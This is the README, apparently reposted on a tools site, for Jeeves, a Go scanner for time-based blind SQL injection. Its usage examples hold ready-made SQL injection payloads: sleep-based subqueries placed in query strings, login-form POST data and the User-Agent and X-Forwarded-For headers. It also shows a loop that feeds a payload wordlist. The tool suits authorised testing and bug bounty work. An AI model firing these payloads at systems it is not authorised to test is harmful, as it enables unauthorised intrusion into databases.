Jeeves – Time-Based Blind SQLInjection Finder
Jeeves is made for looking to Time-Based Blind SQLInjection through recon.
– Installation & Requirements:
Installing Jeeves
$ go install github.com/ferreiraklet/Jeeves@latestOR
$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h– Usage & Explanation:
In Your recon process, you may find endpoints that can be vulnerable to sql injection, Ex: https://redacted.com/index.php?id=1
Single urls
echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10In –payload-time you must use the time mentioned in payload
From list
cat targets | jeeves --payload-time 5
Adding Headers
Pay attention to the syntax! Must be the same =>
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"Using proxy
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"Proxy + Headers =>
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"Post Request
Sending data through post request ( login forms, etc )
Pay attention to the syntax! Must be equal! ->
echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"
echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"Another ways of Usage
You are able to use of Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strenght
Command line flags:
Usage:
-t, --payload-time, The time from payload
-p, --proxy Send traffic to a proxy
-c Set Concurrency, Default 25
-H, --headers Custom Headers
-d, --data Sending Post request with data
-h Show This Help MessageUsing with sql payloads wordlist
cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;doneTesting in headers
echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
Payload credit: https://github.com/rohit0x5OBS:
- Does not follow redirects, If the Status Code is diferent than 200, it returns “Need Manual Analisys”
- Jeeves does not http probing, he is not able to do requests to urls that does not contain protocol ( http://, https:// )
This project is for educational and bug bounty porposes only! I do not support any illegal activities!.
If any error in the program, talk to me immediatly.
Please, also check these =>
Nilo – Checks if URL has status 200
SQLMAP
Blisqy Header time based SQLI
If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.
